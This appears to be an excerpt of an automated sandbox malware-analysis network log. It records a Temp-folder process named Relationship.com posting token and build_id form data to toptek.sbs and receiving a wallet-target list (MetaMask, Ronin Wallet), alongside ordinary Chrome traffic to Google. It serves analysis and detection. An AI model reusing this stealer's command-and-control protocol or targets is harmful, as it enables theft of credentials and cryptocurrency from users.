                                                                                                                                                                                                                                                                          2024-12-22 21:47:43 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 5a 4d 47 56 33 57 34 45 33 45 55 53 32 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------26XT0ZMGV3W4E3EUS2DTContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XT0ZMGV3W4E3EUS2DTCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:44 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.44974494.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:45 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KNG4EUSR1N7YUA16890R
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 6177
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:45 UTC6177OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------KNG4EUSR1N7YUA16890RContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------KNG4EUSR1N7YUA16890RContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------KNG4EUSR1N7YUA16890RCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:46 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.44974594.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:46 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----LXLNGVKNGVAIE3OZMO8Y
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:46 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 4e 47 56 4b 4e 47 56 41 49 45 33 4f 5a 4d 4f 38 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------LXLNGVKNGVAIE3OZMO8YContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LXLNGVKNGVAIE3OZMO8YCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.449751142.250.181.684431312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:49 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:50 GMT
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-UmfMbYtUrw9slKJJ-mA09w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC124INData Raw: 38 38 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 69 6c 69 74 61 72 79 20 68 65 6c 69 63 6f 70 74 65 72 20 63 72 61 73 68 20 63 61 6d 70 20 70 65 6e 64 6c 65 74 6f 6e 22 2c 22 64 61 6e 69 65 6c 20 6a 6f 6e 65 73 22 2c 22 68 6f 6d 65 73 74 65 61 64 20 6d 6f 76 69 65 20 61 6e 67 65 6c 20 73 74 75 64 69 6f 73 22 2c 22 72 69 70 70 6c 65 20 78 72 70 20 70 72 69 63 65 20 70
                                                                                                                                                                                                                                                                          Data Ascii: 881)]}'["",["military helicopter crash camp pendleton","daniel user","homestead movie angel studios","ripple xrp price p
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1390INData Raw: 72 65 64 69 63 74 69 6f 6e 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 73 70 65 63 73 22 2c 22 73 65 72 67 69 6f 20 70 c3 a9 72 65 7a 22 2c 22 73 6f 6c 6f 20 6c 65 76 65 6c 69 6e 67 20 73 65 61 73 6f 6e 20 32 20 74 72 61 69 6c 65 72 22 2c 22 63 68 69 6e 65 73 65 20 73 61 74 65 6c 6c 69 74 65 20 65 78 70 6c 6f 73 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                          Data Ascii: rediction","nintendo switch 2 specs","sergio prez","solo leveling season 2 trailer","chinese satellite explosion"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC670INData Raw: 70 52 57 6c 4a 77 56 7a 64 7a 64 6d 56 35 59 57 68 4a 54 6b 35 31 61 7a 64 70 59 31 4e 5a 55 55 30 72 4e 46 70 69 51 58 64 51 55 45 68 75 4f 58 70 57 65 53 38 77 5a 47 56 71 56 57 39 4d 54 31 4e 58 55 45 56 35 62 48 51 32 4f 44 64 6a 5a 54 46 61 62 6d 46 52 55 55 78 6b 55 6a 4e 4f 64 45 74 42 65 56 4e 46 61 55 35 75 4e 46 5a 6a 52 54 52 36 65 48 70 33 54 53 39 59 4d 6e 4a 6a 5a 58 6c 4c 54 79 74 76 57 44 6b 35 5a 46 52 32 53 57 6c 78 62 32 70 4d 64 47 35 42 53 32 68 71 61 6a 56 78 4d 32 4a 57 62 6e 4e 43 59 55 52 76 54 46 4a 57 57 55 52 43 53 33 42 48 63 6c 4a 48 53 46 55 33 64 56 41 34 51 57 78 74 59 6a 6c 68 63 6d 56 31 59 57 5a 4d 52 44 4a 73 64 55 78 56 55 54 6b 79 4f 58 64 57 61 7a 4a 50 64 6c 42 70 56 55 31 6c 52 44 63 31 4b 32 46 32 54 33 52 34 62
                                                                                                                                                                                                                                                                          Data Ascii: pRWlJwVzdzdmV5YWhJTk51azdpY1NZUU0rNFpiQXdQUEhuOXpWeS8wZGVqVW9MT1NXUEV5bHQ2ODdjZTFabmFRUUxkUjNOdEtBeVNFaU5uNFZjRTR6eHp3TS9YMnJjZXlLTytvWDk5ZFR2SWlxb2pMdG5BS2hqajVxM2JWbnNCYURvTFJWWURCS3BHclJHSFU3dVA4QWxtYjlhcmV1YWZMRDJsdUxVUTkyOXdWazJPdlBpVU1lRDc1K2F2T3R4b
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC89INData Raw: 35 33 0d 0a 67 77 54 55 70 71 61 6e 56 59 55 55 39 6e 56 6e 64 77 4e 6a 52 48 53 30 67 76 65 53 74 44 4e 54 64 57 56 46 68 50 4d 6b 30 7a 52 55 35 7a 61 6c 46 79 53 58 56 57 4d 32 74 30 4e 47 6c 51 55 45 46 49 56 43 39 35 62 46 68 4a 4d 6e 70 31 64 6b 68 43 4e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 53gwTUpqanVYUU9nVndwNjRHS0gveStDNTdWVFhPMk0zRU5zalFySXVWM2t0NGlQUEFIVC95bFhJMnp1dkhCN
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1390INData Raw: 66 35 63 0d 0a 58 64 4e 52 46 42 30 56 46 42 34 65 47 45 31 65 45 4a 49 55 31 67 7a 56 6b 70 36 56 30 49 7a 56 58 42 34 57 6a 56 53 54 30 70 70 65 47 46 52 54 55 63 7a 54 57 4d 31 53 58 45 77 56 30 30 35 5a 7a 45 76 52 6d 4e 58 61 55 6c 71 56 48 68 75 64 6b 31 32 4e 47 6b 7a 56 54 56 49 4d 69 39 32 62 58 45 31 63 47 5a 6a 62 6c 56 4a 51 6d 52 5a 4e 32 35 6c 54 69 38 77 63 6c 51 33 62 6c 52 6b 54 45 64 71 64 6d 4d 79 52 56 56 4a 4d 6d 64 4e 53 46 46 45 4e 6b 64 70 4f 47 30 78 63 6d 64 43 52 33 64 7a 63 7a 5a 6f 57 55 51 72 53 46 4e 79 4f 54 64 49 51 6d 5a 4b 4d 32 4d 34 56 31 59 34 61 55 39 51 65 6c 45 34 52 6d 70 44 64 44 42 7a 62 56 4e 53 51 30 31 71 54 45 56 75 55 46 46 6d 61 57 74 44 55 6d 38 72 52 7a 5a 61 63 55 39 31 4f 56 45 78 61 54 46 31 51 57 4a
                                                                                                                                                                                                                                                                          Data Ascii: f5cXdNRFB0VFB4eGE1eEJIU1gzVkp6V0IzVXB4WjVST0ppeGFRTUczTWM1SXEwV005ZzEvRmNXaUlqVHhudk12NGkzVTVIMi92bXE1cGZjblVJQmRZN25lTi8wclQ3blRkTEdqdmMyRVVJMmdNSFFENkdpOG0xcmdCR3dzczZoWUQrSFNyOTdIQmZKM2M4V1Y4aU9QelE4RmpDdDBzbVNSQ01qTEVuUFFmaWtDUm8rRzZacU91OVExaTF1QWJ
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1390INData Raw: 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 34 76 4c 30 46 42 51 6b 56 4a 51 55 56 42 51 56 46 42 54 55 4a 4a 5a 30 46 44 52 56 46 46 52 45 56 52 53 43 39 34 51 55 46 69 51 55 46 42 51 6b 4a 52 52 55 4a 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 47 51 56 46 4e 52 55 4a 6e 59 30 4e 42 55 43 39 46 51 55 52 4e 55 55 46 42 53 55 4a 42 64 30 31 44 51 58 64 52 53 30 46 33 52 55 46 42 51 55 46 42 51 55 46 46 51 30 46 33 51 55 56 46 55 56 56 54 53 56 52 47 55 6b 55 77 52 6d 68 4a 61 6b 70 34 4f 45 46 5a 53 45 5a 44 54 6c 4e 6e 57 6b
                                                                                                                                                                                                                                                                          Data Ascii: zTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQkJRRUJBQUFBQUFBQUFBQUFBQUFGQVFNRUJnY0NBUC9FQURNUUFBSUJBd01DQXdRS0F3RUFBQUFBQUFFQ0F3QUVFUVVTSVRGUkUwRmhJakp4OEFZSEZDTlNnWk
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC1159INData Raw: 48 6f 77 62 46 70 79 62 57 68 33 63 47 46 4f 54 6c 6c 78 51 55 4a 43 54 54 52 34 61 6b 68 43 54 31 49 72 65 45 5a 47 59 6d 31 33 64 48 5a 43 54 7a 46 46 56 30 30 34 63 32 4e 56 51 54 41 72 4f 55 34 78 5a 45 4d 30 59 6d 46 48 64 56 6b 77 61 30 70 42 65 47 74 72 51 32 6c 57 4e 6a 68 70 4b 30 59 33 54 45 39 6f 55 45 39 43 62 6b 68 79 55 31 68 72 4e 6b 74 78 61 47 4a 54 65 55 55 34 59 33 46 53 55 6a 64 76 4f 46 70 43 4e 7a 67 31 62 33 4a 77 4d 58 52 68 61 46 4d 32 4e 31 4e 57 4e 48 67 79 54 6b 52 5a 54 6b 74 75 54 31 70 72 62 53 73 33 53 54 6c 76 54 45 39 31 51 30 39 50 54 33 5a 79 4b 7a 46 4f 56 48 70 32 57 54 4a 4f 4e 33 46 56 61 31 52 33 55 6e 68 58 4e 31 42 7a 59 6b 64 54 55 55 39 50 62 45 5a 4e 62 54 45 77 65 55 4d 35 4d 6d 30 76 64 58 70 49 4e 32 68 31
                                                                                                                                                                                                                                                                          Data Ascii: HowbFpybWh3cGFOTllxQUJCTTR4akhCT1IreEZGYm13dHZCTzFFV004c2NVQTArOU4xZEM0YmFHdVkwa0pBeGtrQ2lWNjhpK0Y3TE9oUE9CbkhyU1hrNktxaGJTeUU4Y3FSUjdvOFpCNzg1b3JwMXRhaFM2N1NWNHgyTkRZTktuT1prbSs3STlvTE91Q09PT3ZyKzFOVHp2WTJON3FVa1R3UnhXN1BzYkdTUU9PbEZNbTEweUM5Mm0vdXpIN2h1
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.449752142.250.181.684431312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.449753142.250.181.684431312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:50 GMT
                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC372INData Raw: 31 38 61 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                          Data Ascii: 18aa)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
